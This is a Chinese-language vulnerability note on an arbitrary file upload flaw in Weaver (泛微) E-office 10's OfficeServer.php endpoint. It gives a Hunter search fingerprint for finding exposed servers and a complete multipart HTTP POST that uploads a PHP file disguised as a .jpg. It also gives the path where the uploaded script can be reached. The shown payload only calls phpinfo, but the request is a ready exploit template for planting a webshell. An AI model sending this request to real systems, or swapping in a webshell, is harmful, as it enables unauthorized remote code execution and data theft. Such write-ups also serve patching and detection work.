泛微E-office 10 OfficeServer 任意文件上传漏洞
一、漏洞简介
泛微e-office是一款标准化的协同OA办公软件,泛微 E-office 10 OfficeServer 存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,在服务器上执行任意命令、读取敏感信息等。
二、影响版本
- 泛微OA E-office V10
三、资产测绘
- hunter
web.body="eoffice10"&&web.body="eoffice_loading_tip" - 特征
四、漏洞复现
POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 395
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Accept-Encoding: gzip, deflate
Connection: close
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition: form-data; name="FileData"; filename="1.jpg"
Content-Type: image/jpeg
<?php phpinfo();unlink(__FILE__);?>
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition: form-data; name="FormData"
{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test12.php'}
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--
上传文件地址
/eoffice10/server/public/iWebOffice2015/Document/test12.php